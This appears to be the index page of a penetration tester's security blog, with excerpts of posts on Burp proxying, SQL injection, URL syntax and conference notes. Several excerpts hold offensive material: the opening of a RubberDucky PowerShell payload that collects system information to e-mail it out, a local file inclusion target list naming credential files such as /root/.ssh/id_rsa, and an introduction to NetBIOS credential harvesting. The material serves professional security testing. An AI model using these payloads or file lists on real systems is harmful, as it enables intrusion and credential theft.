Static Sites in 2016
Mar 25, 2016
It’s early 2016, and there are a multitude of content management systems and blog platforms out there:
Wikipedia’s List of Content Management Systems The security blog I contribute to, Penetrate.IO runs on the venerable Wordpress and requires constant updates to stay one step ahead of attackers. This becomes tiresome after a while, especially since the only thing I’m interested in hosting is a series of articles. These don’t require server-side computation, simply hosting.
Configure an Upstream Proxy for Burpsuite
Nov 5, 2015
I had the need to proxy traffic from Burpsuite to another proxy during web app testing this week. There are a few ways to do this, but this method was the easiest since I already had Burpsuite’s TLS certificate installed. For more information on this, see the Burpsuite help. To configure an upstream proxy for Burpsuite, such as OWASP ZAP, follow these steps:
First, configure your upstream proxy that will sit between Burpsuite and the web application to listen on a different port since they both bind TCP 8080 by default.
Make a connection
Sep 18, 2015
This post was inspired by a client who came to me and said “I do not understand all of these findings, can you explain them to me?”, referring to my web application penetration test deliverable. We spoke for an hour, as I described the various findings to him. I corrected him when his understanding was shaky, and I confirmed where his understanding was solid. He had a development background, and was studying for a security certification, but he was managing a large security project for a well-known company and I was surprised to learn he was a security newbie.
My Security 101
Jan 20, 2015
Adam Shostack recently published a great read on why the phrase “X is Security 101” is a hindsight-focused and generally not very useful statement.
I completely agree with his point that people who are (or pretend to be) security experts need to do more than flippantly make this remark when discussing the latest security story. [I think this is part of a larger, symptomatic issue the InfoSec community has, but I’m still formulating enough thoughts on that to publish a post on it].
RubberDucky Powershell Payload
Dec 22, 2014
On a recent engagement I supported the lead by developing a PowerShell payload for a RubberDucky. The gist is that it will run a handful of standard Windows commands and then e-mail the results to a specified address. It proved to be very helpful and I’ve included it below with comments:
# Set execution policy to allow unrestricted script scope Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false #Create results file in current user's temp directory $results = $env:temp + '\results.
PHP, MySql, and Injection
Nov 26, 2014
Inspired by Jack Daniel’s “Shoulders of InfoSec Project”, this post will be focused on the people and technologies behind one of the most prevalent attacks on web sites: SQL injection.
Oct 6, 2014
URL Syntax https://admin:firstname.lastname@example.org:80/bio.txt;pp=1&qp=2#Three
URL Part URL Data Scheme https User admin Password pass123 Subdomain www Domain example.com Port 80 Path /bio.txt Path Parameter pp=1 Query Parameter qp=2 Fragment Three Safe Characters RFC1738 section 2.2 outlines the safe characters to use in an HTTP URL Scheme:
Oct 1, 2014
Unfortunately, I didn’t arrive at the ballroom early enough to get seats, or even standing room, to see this talk in-person:
Ed Skoudis: How To Give The Best Pen Test Of Your Life
If you’re a Pen Tester, this talk is a must-see. Once you’ve finished that talk, check out John Strand’s excellent follow-up talk!
After competing for Friday night, most of Saturday, and Sunday morning, I emerged as the 30th position (solo) out of the 120 teams competing in the CTF.
Local File Inclusion Mini-list
Sep 25, 2014
Version 0.1 Linux files /etc/passwd /etc/group /etc/hosts /etc/motd /etc/issue /etc/bashrc /etc/apache2/apache2.conf /etc/apache2/ports.conf /etc/apache2/sites-available/default /etc/httpd/conf/httpd.conf /etc/httpd/conf.d /etc/httpd/logs/access.log /etc/httpd/logs/access_log /etc/httpd/logs/error.log /etc/httpd/logs/error_log /etc/init.d/apache2 /etc/mysql/my.cnf /etc/nginx.conf /opt/lampp/logs/access_log /opt/lampp/logs/error_log /opt/lamp/log/access_log /opt/lamp/logs/error_log /proc/self/environ /proc/version /proc/cmdline /proc/mounts /proc/config.gz /root/.bashrc /root/.bash_history /root/.ssh/authorized_keys /root/.ssh/id_rsa /root/.ssh/id_rsa.keystore /root/.ssh/id_rsa.pub /root/.ssh/known_hosts /usr/local/apache/htdocs/index.html /usr/local/apache/conf/httpd.conf /usr/local/apache/conf/extra/httpd-ssl.conf /usr/local/apache/logs/error_log /usr/local/apache/logs/access_log /usr/local/apache/bin/apachectl /usr/local/apache2/htdocs/index.html /usr/local/apache2/conf/httpd.conf /usr/local/apache2/conf/extra/httpd-ssl.conf /usr/local/apache2/logs/error_log /usr/local/apache2/logs/access_log /usr/local/apache2/bin/apachectl /usr/local/etc/nginx/nginx.conf /usr/local/nginx/conf/nginx.conf /var/apache/logs/access_log /var/apache/logs/access.log /var/apache/logs/error_log /var/apache/logs/error.log /var/log/apache/access.log /var/log/apache/access_log /var/log/apache/error.log /var/log/apache/error_log /var/log/httpd/error_log /var/log/httpd/access_log Windows files C:\boot.ini C:\apache\logs\access.log C:\apache\logs\error.log C:\Program Files\Apache Software Foundation\Apache2.
NetBIOS Name Spoofing and SMB
Jun 5, 2014
This is a fun technique for harvesting user credentials that still works: NetBIOS name spoofing. NetBIOS is a Session layer technology from the early 1980’s that is still in use on networks today. Today, NetBIOS is used predominately in Windows networks as the session service for Server Message Block (SMB) aka Common Internet File System (CIFS), an Application layer technology for sharing files, printers, and inter process communication (IPC).